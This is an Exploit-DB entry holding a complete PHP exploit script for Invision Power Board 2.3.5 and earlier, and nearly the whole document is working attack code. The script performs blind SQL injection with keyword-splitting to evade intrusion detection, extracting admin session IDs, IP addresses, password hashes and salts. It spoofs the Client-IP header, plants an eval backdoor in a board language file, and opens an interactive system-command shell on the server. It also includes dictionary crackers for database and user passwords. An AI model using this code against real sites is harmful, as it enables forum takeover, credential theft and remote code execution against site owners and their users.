Invision Power Board <= 2.3.5 - Multiple Vulnerabilities Exploit revised

2008-08-29T00:00:00
ID EDB-ID:6325
Type exploitdb
Reporter DarkFig
Modified 2008-08-29T00:00:00

Description

Invision Power Board <= 2.3.5 Multiple Vulnerabilities Exploit (revised). Webapps exploit for php platform

                                        
                                            #!/usr/bin/php -q
&lt;?php
error_reporting(E_ALL ^ E_NOTICE);

# yeah ... it rox (:
class ipb_spl
{
	var $web;

	function main()
	{
		$this-&gt;mhead();
		
		# Gimme your args
		$this-&gt;p_attack = $this-&gt;get_p('attack', true);
		$this-&gt;p_prox   = $this-&gt;get_p('proxhost');
		$this-&gt;p_proxa  = $this-&gt;get_p('proxauth');
		
		$this-&gt;init_global();
		
		# Proxy params
		if( $this-&gt;p_prox )
		{
			$this-&gt;web-&gt;proxy($this-&gt;p_prox);
			
			if( $this-&gt;p_proxa )
			$this-&gt;web-&gt;proxyauth($this-&gt;p_proxa);
		}

		# Where do we go ?
		switch( $this-&gt;p_attack )
		{
			case 1:	 $this-&gt;code_exec();  break;
			case 2:  $this-&gt;bf_sql_pwd(); break;
			case 3:  $this-&gt;bf_usr_pwd(); break;
			default: $this-&gt;usage();
		}

		return;
	}
	
	function code_exec($loop=1)
	{
		# First loop
		if( $loop == 1 )
		{
			$this-&gt;set_sql_param();
			$this-&gt;set_sql_focus();
		
			$this-&gt;p_acp = $this-&gt;get_p('acp');
				
			# ACP path
			if( !$this-&gt;p_acp )
			{
				# If the user changed the ACP directory, we can
				# find it (if the "Remove ACP Link" option was not
				# applied) by log in as an Admin, and then click
				# on "Admin CP". This can be done with a user
				# but I didn't implemented that  ;) 
				$this-&gt;msg('Using default ACP path: admin', 1);
				$this-&gt;p_acp = 'admin';
			}
			else 
			$this-&gt;msg('Using ACP path "'.$this-&gt;p_acp.'"', 1);
		
			# Init client headers:
			# Only if we have the same IP as the targeted user (not admin),
			# it resets session datas, so we try to spoof our 
			# IP as a random one in order to keep user's session datas while
			# we bruteforce SQL fields.
			$this-&gt;bypass_matches();
		
			# Remove expired sessions ( time() - 60*60*2  =  &gt; 2 hours )
			$this-&gt;web-&gt;get($this-&gt;p_url.$this-&gt;p_acp.'/index.php?');
			$this-&gt;msg('Removed all out of date admin sessions', 1);
		
			# Cookie prefix
			$this-&gt;get_cprefix();
		}
				
		# Admin session ?
		$this-&gt;msg('Trying to find an admin session id', 0);
		
		# Got one :]
		if( $this-&gt;get_admin_sess() )
		{
			$this-&gt;s_admin = true;
			$this-&gt;s_sess  = $this-&gt;data['a_sess_id'];
			$this-&gt;a_url   = $this-&gt;p_url.$this-&gt;p_acp.'/index.php?adsess='.$this-&gt;s_sess;
		}
		
		# Nothing special
		else 
		{
			$this-&gt;s_admin = false;
			$this-&gt;msg('No admin session id found', -1);
		}
		
		# User session ?
		if( !$this-&gt;s_sess )
		{
			$this-&gt;msg('Trying to find a user session id', 0);
			
			# Yep
			if( $this-&gt;get_user_sess() )
			$this-&gt;s_sess = $this-&gt;data['u_sess_id'];

			# F0ck
			else 
			{
				$this-&gt;msg('No user session id found', -1);
				$this-&gt;msg('Admin session &gt; 2 hours or user logged out', 0);
				$this-&gt;msg('Keeping trying until the user connects', 0);
				$this-&gt;msg('Entering loop #'.$loop.' ...', 0);
				$this-&gt;code_exec(++$loop);
			}
		}
			
		$this-&gt;msg('Getting security options', 0);
		
		# Security options
		$this-&gt;get_sec_options();
		
		# IP filter ?
		if( $this-&gt;conf['ip'] === '1' )
		{
			$this-&gt;s_bypass = true;
			
			$this-&gt;msg('IP filter option is turned on', 0);
			
			# Spoofing protection ?
			if( !$this-&gt;conf['xforward'] )
			{
				# Assuming our IP isn't the same etc..
				$this-&gt;msg('Can\'t bypass the IP filter', -1);
				exit(1);
			}
			
			# X-Forwarded-For / Client-IP /
			# Proxy-User / X-Cluster-Client-IP
			else 
			{
				$this-&gt;msg('Cool, we can spoof our IP (Client-IP)', 1);
				
				if( $this-&gt;s_admin )
				{
					$this-&gt;msg('Trying to find admin\'s last IP', 0);
					
					# Admin IP found
					$this-&gt;get_admin_ip();
					$this-&gt;s_ip = $this-&gt;data['a_ip_addr'];
				}
				else 
				{
					$this-&gt;s_admin = false;
					$this-&gt;msg('Trying to find user\'s last used IP', 0);
					
					# User IP found
					$this-&gt;get_user_ip();
					$this-&gt;s_ip = $this-&gt;data['u_ip_addr'];
				}
				
				# Nothing found
				if( !$this-&gt;s_ip )
				{
					# Ahah (:
					$this-&gt;msg('No IP found for this user', -1);
					$this-&gt;give_hope();
				}
				
				# Got one !
				else
				$this-&gt;msg('Ok, using IP '.$this-&gt;s_ip, 1);
			}
		}
		
		# User-Agent filter ?
		if( $this-&gt;conf['browser'] === '1' && !$this-&gt;s_admin )
		{
			$this-&gt;s_bypass = true;
			
			$this-&gt;msg('Trying to find a valid user-agent', 0);
			
			# Good
			if( $this-&gt;get_user_agent() )
			{
				$this-&gt;msg('Ok, using user-agent '.substr($this-&gt;data['u_agent'], 0, 10).'...', 1);
				$this-&gt;s_agent = $this-&gt;data['u_agent'];
			}
			
			# WTF :!
			else
			{
				$this-&gt;msg('No user-agent found for this user', -1);
				$this-&gt;msg('Maybe the browser didn\'t send this header', 0);
				$this-&gt;s_agent = '';
			}
			
		}

		# Cool !?
		if( !$this-&gt;s_bypass )
		$this-&gt;msg('Cool, nothing to bypass', 1);
		
		$this-&gt;msg('Trying to log in', 0);
		
		# Owned =]
		if( $this-&gt;is_logged() )
		{
			# PHP code
			if( $this-&gt;s_admin )
			{
				$this-&gt;msg('Logged in with an admin session', 1);
				$this-&gt;exec_code();
			}
			
			# Normal user ?
			else
			{
				$this-&gt;msg('Logged in with a user session', 1);
				$this-&gt;msg('You can log in using the cookie session_id', 1);

				if( $this-&gt;s_ip !== $this-&gt;def_ip )
				$this-&gt;msg('Set the Client-IP header to: '.$this-&gt;s_ip, 1);
				
				if( $this-&gt;s_agent )
				$this-&gt;msg('Set the User-Agent header to: '.$this-&gt;s_agent, 1);
				
				exit(0);
			}
		}
		else 
		{
			# Even if the admin logged out .. the admin session
			# is still valid  ;) 
			$this-&gt;msg('Can\'t log in, the session has expired ?!', -1);
			$this-&gt;give_hope();
		}
		
		return;
	}
	
	function bf_sql_pwd()
	{
		$this-&gt;p_ip    = $this-&gt;get_p('ip', true);
		$this-&gt;p_dict  = $this-&gt;get_p('dict', true);
		
		$this-&gt;p_sql_u = $this-&gt;get_p('sqlusr');
		
		$this-&gt;p_url   = $this-&gt;get_p('url');
		$this-&gt;p_uname = $this-&gt;get_p('uname');
		$this-&gt;p_pwd   = $this-&gt;get_p('pwd');
		// or 
		$this-&gt;p_uid   = $this-&gt;get_p('uid');
		$this-&gt;p_hash  = $this-&gt;get_p('passhash');
		$this-&gt;p_shold = $this-&gt;get_p('stronghold');
		
		if( $this-&gt;p_uname && $this-&gt;p_pwd && $this-&gt;p_url )
		{
			$this-&gt;get_cprefix();
			
			$this-&gt;msg('Trying to get some cookies', 0);
			
			$g_dat = 'index.php?act=Login&CODE=01&CookieDate=1';
			$p_dat = 'UserName='.$this-&gt;p_uname.'&PassWord='.$this-&gt;p_pwd.'&x=0&y=0';
		
			$this-&gt;web-&gt;post($this-&gt;p_url.$g_dat, $p_dat);
		
			$this-&gt;p_uid   = $this-&gt;web-&gt;cookie[$this-&gt;s_cprefix.'member_id'];
			$this-&gt;p_hash  = $this-&gt;web-&gt;cookie[$this-&gt;s_cprefix.'pass_hash'];
			$this-&gt;p_shold = $this-&gt;web-&gt;cookie[$this-&gt;s_cprefix.'ipb_stronghold'];
		}
		elseif( !$this-&gt;p_uid || !$this-&gt;p_hash || !$this-&gt;p_shold )
		$this-&gt;usage();
		
		if( !$this-&gt;p_uid || !$this-&gt;p_hash || !$this-&gt;p_shold )
		{
			$this-&gt;msg('Can\'t get cookies', -1);
			$this-&gt;msg('You should try with other parameters', -1);
			exit(1);
		}
		
		$this-&gt;msg('Ok, using cookies:', 1);
		
		$this-&gt;msg('member_id='.$this-&gt;p_uid, 1);
		$this-&gt;msg('pass_hash='.$this-&gt;p_hash, 1);
		$this-&gt;msg('ipb_stronghold='.$this-&gt;p_shold, 1);
		
		if( !$this-&gt;p_sql_u )
		{
			$this-&gt;set_sql_param();
			
			$this-&gt;msg('Trying to get the current sql user', 0);
			
			if( !$this-&gt;get_sql_user() )
			{
				$this-&gt;msg('Can\'t get the sql user', -1);
				$this-&gt;msg('If you know the sql user, use -sqlusr', -1);
				exit(1);
			}
			else
			$this-&gt;p_sql_u = $this-&gt;data['sql_user'];
		}
		
		$this-&gt;msg('Ok, using sql user '.$this-&gt;p_sql_u, 1);
		
		$dico_c = file($this-&gt;p_dict);
		$ip_a   = explode('.', $this-&gt;p_ip);
		
		$this-&gt;msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0);
		$this-&gt;msg('You should take a drink ...', 0);
		
		foreach( $dico_c as $line )
		{
			$md5 = md5(trim($line).$this-&gt;p_sql_u);
			$md5 = md5($this-&gt;p_uid.'-'.$ip_a[0].'-'.$ip_a[1].'-'.$this-&gt;p_hash).$md5;
			$md5 = md5($md5);

			if( $this-&gt;p_shold === $md5 )
			{
				$this-&gt;msg('Found something cool =]', 1);
				$this-&gt;msg('SQL password: '.$line, 1);
				exit(1);
			}

		}
		
		$this-&gt;msg('End of the wordlist, password not found', -1);
		
		return;
	}

	function bf_usr_pwd()
	{
		$this-&gt;p_dict  = $this-&gt;get_p('dict', true);

		$this-&gt;p_hash  = $this-&gt;get_p('passhash');
		$this-&gt;p_salt  = $this-&gt;get_p('salt');
		
		if( !$this-&gt;p_hash || !$this-&gt;p_salt )
		{
			$this-&gt;set_sql_param();
			$this-&gt;set_sql_focus();
		}
		
		if( !$this-&gt;p_hash )
		{
			$this-&gt;msg('Trying to get the password hash', 0);
			
			if( !$this-&gt;get_pass_hash() )
			{
				$this-&gt;msg('Can\'t get the password hash', -1);
				exit(1);
			}
			else 
			$this-&gt;p_hash = $this-&gt;data['pass_hash'];
		}
		
		$this-&gt;msg('Ok, using hash '.$this-&gt;p_hash, 1);
		
		if( !$this-&gt;p_salt )
		{
			$this-&gt;msg('Trying to get the password salt', 0);
			
			if( !$this-&gt;get_pass_salt() )
			{
				$this-&gt;msg('Can\'t get the password salt', -1);
				exit(1);
			}
			else 
			$this-&gt;p_salt = $this-&gt;data['pass_salt'];
		}
		
		$this-&gt;msg('Ok, using salt '.$this-&gt;p_salt, 1);
		
		$dico_c = file($this-&gt;p_dict);
		
		$this-&gt;msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0);
		$this-&gt;msg('You should take a drink ...', 0);
		
		foreach( $dico_c as $line )
		{
			if( $this-&gt;p_hash === md5(md5($this-&gt;p_salt).md5(trim($line))) )
			{
				$this-&gt;msg('Found something cool =]', 1);
				$this-&gt;msg('User password: '.$line, 1);
				exit(1);
			}
		}
		
		$this-&gt;msg('End of the wordlist, password not found', -1);
		
		return;
	}
	
	function set_sql_param()
	{
		$this-&gt;p_url   = $this-&gt;get_p('url', true);
		$this-&gt;p_pre   = $this-&gt;get_p('prefix');
		
		# Table prefix
		if( !$this-&gt;p_pre )
		{
			# Default table prefix if not precised
			$this-&gt;msg('Using default table prefix: ibf_', 1);
			$this-&gt;p_pre = 'ibf_';
		}
		else 
		$this-&gt;msg('Using table prefix '.$this-&gt;p_pre, 1);

	}
	
	function set_sql_focus()
	{
		$this-&gt;p_uname = $this-&gt;get_p('uname');
		$this-&gt;p_uid   = $this-&gt;get_p('uid');
		
		if( $this-&gt;p_uname )
		$this-&gt;msg('Using targeted username '.$this-&gt;p_uname, 1);
		
		elseif( $this-&gt;p_uid )
		$this-&gt;msg('Using targeted user id '.$this-&gt;p_uid, 1);
		
		# Target
		if( !($this-&gt;p_uname || $this-&gt;p_uid) )
		{
			# Default uid if not precised
			$this-&gt;msg('Using default user id: 1', 1);
			$this-&gt;p_uid = 1;
		}

		# Focus on ?
		if( $this-&gt;p_uname )
		$this-&gt;t_on = 'members_l_username=\''.addslashes($this-&gt;p_uname).'\'';
		
		else 
		$this-&gt;t_on = 'id='.(int)$this-&gt;p_uid;
		
		return;
	}
	
	function exec_code()
	{
		$this-&gt;write_code();
		
		while( $this-&gt;cmd_prompt() )
		{
			$this-&gt;web-&gt;addheader('My-Code', $this-&gt;cmd);
			$this-&gt;web-&gt;get($this-&gt;p_url);

			print "\n".$this-&gt;get_answer();
		}
		
		exit(0);
	}
	
	function get_answer()
	{
		$res_a = explode($this-&gt;res_sep, $this-&gt;web-&gt;getcontent());
		
		if( !$res_a[1] )
		return 'No result to retrieve';
		
		else 
		return $res_a[1];
	}
	
	function cmd_prompt()
	{
		$this-&gt;cmd = $this-&gt;msg('root@ipb: ', 1, 1, 0, true);
		
		if( !ereg('^(quit|exit)$', $this-&gt;cmd) )
		{		
			$this-&gt;cmd = base64_encode($this-&gt;cmd);
			$this-&gt;cmd = str_replace('%CMD%', $this-&gt;cmd, $this-&gt;php_send);
			
			return TRUE;
		}

		else
		   return FALSE;
	}
	
	function write_code()
	{
		# Gimme the language ID
		$this-&gt;get_def_lang();
		
		# Current lang settings
		$p_dat =
		'code=edit2&act=lang&id='.$this-&gt;g_lid.'&section'.
		'=lookandfeel&lang_file=lang_boards.php';
		
		$this-&gt;web-&gt;post($this-&gt;a_url, $p_dat);

		# We collect each variable name / value
		if( preg_match_all($this-&gt;reg_lvar, $this-&gt;web-&gt;getcontent(), $l_vars) )
		{
			# POST data 
			$p_dat =
			'code=doedit&act=lang&id='.$this-&gt;g_lid.
			'&lang_file=lang_boards.php&section=lo'.
			'okandfeel&';

			# &Name=Value
			for( $i=0; $i&lt;count($l_vars[0]); $i++ )
			{
				$p_dat .=
				'&XX_'.$l_vars[1][$i].'='.urlencode($l_vars[2][$i]);
				
				# We write our PHP code in the first variable
				if( $i == 0 )
				$p_dat .= $this-&gt;php_write;
			}
			
			# Go on
			$this-&gt;web-&gt;post($this-&gt;a_url, $p_dat);
			
			$this-&gt;msg('PHP code written', 1);
		}
		else
		{
			# WTF :!
			$this-&gt;msg('Can\'t find block variables', 0);
			exit(1);
		}
		
		return;
	}
	
	function get_def_lang()
	{
		$this-&gt;msg('Trying to get the set language id', 0);
		
		$this-&gt;web-&gt;get($this-&gt;a_url.'&section=lookandfeel&act=lang');
		
		if( preg_match($this-&gt;reg_lang, $this-&gt;web-&gt;getcontent(), $lids) )
		{
			$this-&gt;g_lid = $lids[1];
			$this-&gt;msg('Using language id '.$this-&gt;g_lid, 1);
		}
		else 
		{
			$this-&gt;msg('Can\'t get the default language id', -1);
			exit(1);
		}
		
		return;
	}
	
	function is_logged()
	{
		$this-&gt;bypass_matches();

		# User session ok ?
		if( !$this-&gt;s_admin )
		{
			$match = 'act=Login&amp;CODE=03';
			$this-&gt;web-&gt;addcookie($this-&gt;s_cprefix.'session_id', $this-&gt;s_sess);
			$this-&gt;web-&gt;get($this-&gt;p_url);
		}
		
		# Admin session ok ?
		else
		{
			$match = '&section=';
			$this-&gt;web-&gt;get($this-&gt;a_url);
		}
		
		if( preg_match("/$match/i", $this-&gt;web-&gt;getcontent()) )
		return true;
		
		else 
		return false;		
	}
	
	function bypass_matches()
	{
		# match_browser
		$this-&gt;web-&gt;agent($this-&gt;s_agent);
		
		# match_ipaddress
		$this-&gt;web-&gt;addheader('Client-IP', $this-&gt;s_ip);
		
		return;
	}
	
	function get_cprefix()
	{
		$this-&gt;msg('Trying to get the cookie prefix', 0);
				
		# Set-Cookie: session_id=...; path=/
		$this-&gt;web-&gt;get($this-&gt;p_url);
		
		$this-&gt;s_cprefix = '';
		
		if( $this-&gt;web-&gt;cookie )
		{
			foreach( $this-&gt;web-&gt;cookie as $name =&gt; $value)
			{
				if( preg_match($this-&gt;reg_cpre, $name, $cmatches) )
				{
					$this-&gt;s_cprefix = $cmatches[1];
					break;
				}
			}
		}
		
		if( !$this-&gt;s_cprefix )
		$this-&gt;msg('No cookie prefix set', 1);
		
		else 
		$this-&gt;msg('Using cookie prefix '.$this-&gt;s_cprefix, 1);
		
		return;
	}
	
	function get_sec_options()
	{
		# If no value, take the default one
		$this-&gt;get_conf('t.conf_value');
		$this-&gt;get_conf('t.conf_default');
		
		return;
	}
	
	function get_conf($field)
	{
		$this-&gt;init_sql();
		
		$this-&gt;t_table = 'conf_settings';	
		$this-&gt;t_field = $field;
		$this-&gt;t_char  = $this-&gt;chr_num;
		
		$this-&gt;t_add_0 = "AND t.conf_key='match_browser'";

		if( $this-&gt;conf['browser'] === '' )
		$this-&gt;conf['browser'] = $this-&gt;bf_inj();

		$this-&gt;t_add_0 = "AND t.conf_key='match_ipaddress'";
		
		if( $this-&gt;conf['ip'] === '' )
		$this-&gt;conf['ip'] = $this-&gt;bf_inj();
		
		$this-&gt;t_add_0 = "AND t.conf_key='xforward_matching'";
		
		if( $this-&gt;conf['xforward'] === '' )
		$this-&gt;conf['xforward'] = $this-&gt;bf_inj();

		return;
	}
	
	function get_login_key()
	{
		$this-&gt;init_sql();
		
		$this-&gt;t_key             = 'login_key';
		$this-&gt;t_table           = 'members';
		$this-&gt;t_field           = 't.member_login_key';
		$this-&gt;t_join            = 't.id=m.id';
		$this-&gt;t_char            = $this-&gt;chr_md5;
		$this-&gt;data['login_key'] = $this-&gt;bf_inj();
		
		return $this-&gt;key_val;
	}
	
	function get_sql_user()
	{
		$this-&gt;init_sql();
		
		$this-&gt;t_key             = 'user()';
		$this-&gt;t_table           = 'members';
		$this-&gt;t_field           = 'user()';
		$this-&gt;t_char            = $this-&gt;chr_all;
		$this-&gt;t_end             = '@';
		$this-&gt;data['sql_user']  = $this-&gt;bf_inj();
		
		return $this-&gt;key_val;
	}
	
	function get_pass_hash()
	{
		$this-&gt;init_sql();
		
		$this-&gt;t_key             = 'pass_hash';
		$this-&gt;t_table           = 'members_converge';
		$this-&gt;t_field           = 't.converge_pass_hash';
		$this-&gt;t_join            = 't.converge_email=m.email';
		$this-&gt;t_char            = $this-&gt;chr_md5;
		$this-&gt;data['pass_hash'] = $this-&gt;bf_inj();
		
		return $this-&gt;key_val;
	}
	
	function get_pass_salt()
	{	
		$this-&gt;init_sql();
		
		$this-&gt;t_key             = 'pass_salt';
		$this-&gt;t_table           = 'members_converge';
		$this-&gt;t_field           = 't.converge_pass_salt';
		$this-&gt;t_join            = 't.converge_email=m.email';
		$this-&gt;t_char            = $this-&gt;chr_all;
		$this-&gt;data['pass_salt'] = $this-&gt;bf_inj();
		
		return $this-&gt;key_val;
	}
	
	function get_admin_sess()
	{
		$this-&gt;init_sql();
		
		$this-&gt;t_key             = 'admin_sid';
		$this-&gt;t_table           = 'admin_sessions';
		$this-&gt;t_field           = 't.session_id';
		$this-&gt;t_join            = 't.session_member_id=m.id';
		$this-&gt;t_sel             = 't.session_log_in_time';
		$this-&gt;t_char            = $this-&gt;chr_md5;
		$this-&gt;data['a_sess_id'] = $this-&gt;bf_inj();
		
		return $this-&gt;key_val;
	}
	
	function get_admin_ip()
	{
		$this-&gt;init_sql();
		
		$this-&gt;t_key             = 'admin_ip';
		$this-&gt;t_table           = 'admin_sessions';
		$this-&gt;t_field           = 't.session_ip_address';
		$this-&gt;t_join            = 't.session_member_id=m.id';
		$this-&gt;t_sel             = 't.session_log_in_time';
		$this-&gt;t_char            = $this-&gt;chr_ip;
		$this-&gt;data['a_ip_addr'] = $this-&gt;bf_inj();
		
		return $this-&gt;key_val;
	}
	
	function get_admin_pwd()
	{
		$this-&gt;init_sql();
		
		$this-&gt;t_key             = 'admin_pwd';
		$this-&gt;t_table           = 'admin_login_logs';
		$this-&gt;t_field           = 't.admin_post_details';
		$this-&gt;t_join            = 't.admin_username=m.members_l_username';
		$this-&gt;t_sel             = 't.admin_id';
		$this-&gt;t_end             = '"';
		$this-&gt;t_bchar           = -4; # ";}}
		$this-&gt;t_char            = $this-&gt;chr_all;
		$this-&gt;data['a_pwd_like']= $this-&gt;bf_inj();
		
		return $this-&gt;key_val;
	}
	
	function get_user_sess()
	{
		$this-&gt;init_sql();
		
		$this-&gt;t_key             = 'user_sid';
		$this-&gt;t_table           = 'sessions';
		$this-&gt;t_field           = 't.id';
		$this-&gt;t_join            = 't.member_id=m.id';
		$this-&gt;t_sel             = 't.running_time';
		$this-&gt;t_char            = $this-&gt;chr_md5;
		$this-&gt;data['u_sess_id'] = $this-&gt;bf_inj();
		
		return $this-&gt;key_val;
	}
	
	function get_user_ip()
	{
		$this-&gt;init_sql();
		
		$this-&gt;t_key             = 'user_ip';
		$this-&gt;t_table           = 'sessions';
		$this-&gt;t_field           = 't.ip_address';
		$this-&gt;t_join            = 't.member_id=m.id';
		$this-&gt;t_sel             = 't.running_time';
		$this-&gt;t_char            = $this-&gt;chr_ip;
		$this-&gt;data['u_ip_addr'] = $this-&gt;bf_inj();
		
		return $this-&gt;key_val;
	}
	
	function get_user_agent()
	{
		$this-&gt;init_sql();
		
		$this-&gt;t_key             = 'user_agent';
		$this-&gt;t_table           = 'sessions';
		$this-&gt;t_field           = 't.browser';
		$this-&gt;t_join            = 't.member_id=m.id';
		$this-&gt;t_sel             = 't.running_time';
		$this-&gt;t_char            = $this-&gt;chr_all;
		$this-&gt;data['u_agent']   = $this-&gt;bf_inj();
		
		return $this-&gt;key_val;
	}
	
	function init_sql()
	{
		# SQL Injection params
		$this-&gt;t_end   = null;
		$this-&gt;t_add_0 = '';
		$this-&gt;t_add_1 = '';
		$this-&gt;t_sel   = '1';
		$this-&gt;t_bchar = 0;
		$this-&gt;t_join  = '';
		$this-&gt;t_key   = '';
		$this-&gt;t_add_1 = 'ORDER BY id DESC LIMIT 1';
		
		return;
	}
	
	function init_global()
	{
		# Charsets
		$this-&gt;chr_spe = str_split(' :/;*(-.!,?§*µù%$£^¨=+})°]àç^_\\`è|[\'{#é~&²"@');
		$this-&gt;chr_num = range(0, 9);
		$this-&gt;chr_md5 = array_merge( $this-&gt;chr_num, range('a', 'f') );
		$this-&gt;chr_ip  = array_merge( $this-&gt;chr_num, array('.') );
		$this-&gt;chr_all = array_merge( $this-&gt;chr_num, range('a', 'z') );
		$this-&gt;chr_all = array_merge( range('A', 'Z'), $this-&gt;chr_all, $this-&gt;chr_spe );

		# SQL Injection
		$this-&gt;def_param = 'index.php?s=&act=xmlout&do=check-display-name&name=%rep_inj%';
	
		# IDS Evasion via %0D
		$this-&gt;def_inj   = "' OR 1=\"'\" U%0DNION %rep_req% OR 1=\"'\" %rep_add% #";
		
		# Results
		$this-&gt;data = array();
		$this-&gt;conf = array('ip' =&gt; '', 'browser' =&gt; '', 'xforward' =&gt; '');
		
		# Misc
		$this-&gt;stat     = array(-1 =&gt; '-', 0 =&gt; '/', 1 =&gt; '+');
		$this-&gt;s_bypass = false;
		$this-&gt;res_sep  = md5(rand());
		$this-&gt;def_ip   = rand(0,255).'.'.rand(0,255).'.'.rand(0,255).'.'.rand(0,255);
		
		# PHP Code
		$this-&gt;php_write = '${${@eval($_SERVER[HTTP_MY_CODE])}}';
		$this-&gt;php_send	 = "print('$this-&gt;res_sep');@system(base64_decode('%CMD%'));";
		$this-&gt;php_send .= "print('$this-&gt;res_sep');exit(0);";
		
		# Regex
		$this-&gt;reg_lang = '#&lt;/span&gt;&lt;/td&gt;[\r\n]*.*[\r\n]*.*code=export&id=([0-9]+)#i';
		$this-&gt;reg_lvar = "#id='XX_([\w]+)'[\x20]+class='multitext'&gt;(.*)&lt;/textarea&gt;&lt;/td&gt;#i";
		$this-&gt;reg_cpre = '#^(.*)session_id$#';
		# $this-&gt;reg_acp  = '#&lt;a href="(.*)"[\x20]+target="_blank"#i';
		
		# Default client headers
		$this-&gt;s_agent = 'Mozilla Firefox';
		$this-&gt;s_ip    = $this-&gt;def_ip;
		
		return;
	}
	
	function bf_inj()
	{
		$this-&gt;sub_chr = $this-&gt;t_bchar;
		$this-&gt;key_val = '';
			
		if( !empty($this-&gt;t_key) )
		$this-&gt;msg('', 0);
		
		while( true )
		{
			if( $this-&gt;t_bchar &lt; 0 )
			$this-&gt;sub_chr--;
			
			else
			$this-&gt;sub_chr++;
	
			# 0-9a-f
			for( $j=0;$j&lt;=count($this-&gt;t_char);$j++ )
			{
				# That one ?
				$chr = $this-&gt;t_char[$j];
				
				# Latest char ?
				if( $j === count($this-&gt;t_char) )
				$chr = $this-&gt;t_end;
				
				# Ascii num
				$asc = ord($chr);
				
				# Screen bug
				if( !empty($this-&gt;t_key) ) 
				{
					$msg  = $this-&gt;t_key.'='.$this-&gt;key_val;
					$msg .= ($chr === $this-&gt;t_end ? "\x20" : $chr);
					
					$this-&gt;msg($msg, 0, 1, 1);
				}
				
				# Focus on the target ?
				if( !empty($this-&gt;t_join) )
				{
					$inj = 
					'SEL%0DECT 1,'.$this-&gt;t_sel.' FR%0DOM '.$this-&gt;p_pre.$this-&gt;t_table.
					' t, '.$this-&gt;p_pre.'members m WH%0DERE '.$this-&gt;t_join.
					' AND m.'.$this-&gt;t_on.' AND ASC%0DII(SUBS%0DTR('.$this-&gt;t_field.
					','.$this-&gt;sub_chr.',1))='.$asc.' '.$this-&gt;t_add_0;
				}
				else 
				{
					$inj =
					'SEL%0DECT 1,'.$this-&gt;t_sel.' FR%0DOM '.$this-&gt;p_pre.$this-&gt;t_table.
					' t WH%0DERE ASC%0DII(SUB%0DSTR('.$this-&gt;t_field.','.$this-&gt;sub_chr.
					',1))='.$asc.' '.$this-&gt;t_add_0;
				}

				# SQL Injection via rawurldecode()
				$inj = str_replace('%rep_req%', $inj, $this-&gt;def_inj);
				$inj = str_replace('%rep_add%', $this-&gt;t_add_1, $inj);
				$inj = str_replace(array('"', "'"), array('%2522', '%2527'), $inj);
				
				# Params
				$inj = str_replace('%rep_inj%', $inj, $this-&gt;def_param);
				$inj = str_replace(array(' ', '#'), array('%20', '%23'), $inj);
				
				$this-&gt;web-&gt;get($this-&gt;p_url.$inj);

				# Ok !?
				if( !strstr($this-&gt;web-&gt;getcontent(), 'notfound') )
				{
					if( $chr !== $this-&gt;t_end )
					{	
						$this-&gt;key_val .= $chr;
						break;
					}
				}
				
				# End
				if( $chr === $this-&gt;t_end )
				{
					# Reverse
					if( $this-&gt;t_bchar &lt; 0 )
					$this-&gt;key_val = strrev($this-&gt;key_val);
					
					if( !empty($this-&gt;t_key) ) 
					$this-&gt;msg($this-&gt;t_key.'='.$this-&gt;key_val, 1, 1, 1);

					return $this-&gt;key_val;
				}
			}
		}
		
	}
	
	function get_p($p, $exit=false)
	{
		global $argv;
		
		foreach( $argv as $key =&gt; $value )
		{
			if( $value === '-'.$p )
			{
				if( isset($argv[$key+1]) && !empty($argv[$key+1]) )
				{					
					return $argv[$key+1];
				}
				else
				{
					if( $exit )
					$this-&gt;usage();
					
					return true;
				}
			}
		}
		
		if( $exit )
		$this-&gt;usage();
		
		return false;
	}
	
	function msg($msg, $nstatus, $nspace=1, $ndel=0, $ask=false)
	{
		if( $ndel ) $type = "\r";
		else        $type = "\n";
		
		# wtf (:
		print
		(
			$type.str_repeat("\x20", $nspace).
			$this-&gt;stat[$nstatus]."\x20".$msg
		);
		
		if( $ask )
		return trim(fgets(STDIN));
	}
	
	function give_hope()
	{				
		$this-&gt;msg('You should try with another user or try another time', -1);
			
		exit(1);
	}
	
	function mhead()
	{
		# Advisory: http://acid-root.new.fr/?0:18
		
		print "\n Invision Power Board &lt;= 2.3.5 Multiple Vulnerabilities";
		print "\n ------------------------------------------------------";
		print "\n\n About:";
		print "\n\n by DarkFig &lt; gmdarkfig (at) gmail (dot) com &gt;";
		print "\n http://acid-root.new.fr/";
		print "\n #acidroot@irc.worldnet.net";
		print "\n\n\n Attack(s):\n";
		
		return;
	}
	
	function usage()
	{

		print "\n -attack &lt;int_choice&gt; &lt;params&gt; [options]\n\n";
		print "  1 - PHP code execution\n\n";
		print "    -url        IPB url with ending slash\n\n";
		print "    -uname      targeted username\n";
		print "    -uid        OR the targeted user id (def: 1)\n\n";
		print "    -prefix     sql table prefix (def: ibf_)\n";
		print "    -acp        admin control panel path (def: admin)\n\n\n";
		print "  2 - Insecure SQL password usage\n\n";
		print "    -ip         your current IP\n";
		print "    -dict       a wordlist file\n\n";
		print "    -url        IPB url with ending slash\n";
		print "    -uname      a valid member username\n";
		print "    -pwd        the associated password\n\n";
		print "    -uid        OR  the targeted member id\n";
		print "    -passhash   the passhash cookie value\n";
		print "    -stronghold the stronghold cookie value\n\n";
		print "    -sqlusr     you can precise the sql user\n";
		print "    -prefix     sql table prefix (def: ibf_)\n\n\n";
		print "  3 - Password bruteforcer\n\n";
		print "    -dict       a wordlist file\n\n";
		print "    -url        IPB url with ending slash\n";
		print "    -uname      targeted username\n";
		print "    -uid        OR  the targeted user id (def: 1)\n";
		print "    -prefix     sql table prefix (def: ibf_)\n\n";
		print "    -passhash   OR the passhash value\n";
		print "    -salt       the salt value\n\n\n";
		print "  Optional: \n\n";
		print "    -proxhost &lt;ip&gt;       if you wanna use a proxy\n";
		print "    -proxauth &lt;usr:pwd&gt;  proxy with authentication\n";
		
		exit(1);
	}
	
}



/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
 * You should have received a copy of the GNU General Public License 
 * along with this program; if not, write to the Free Software 
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
 * 
 * TITLE:          PhpSploit Class
 * REQUIREMENTS:   PHP 4 / PHP 5
 * VERSION:        2.1
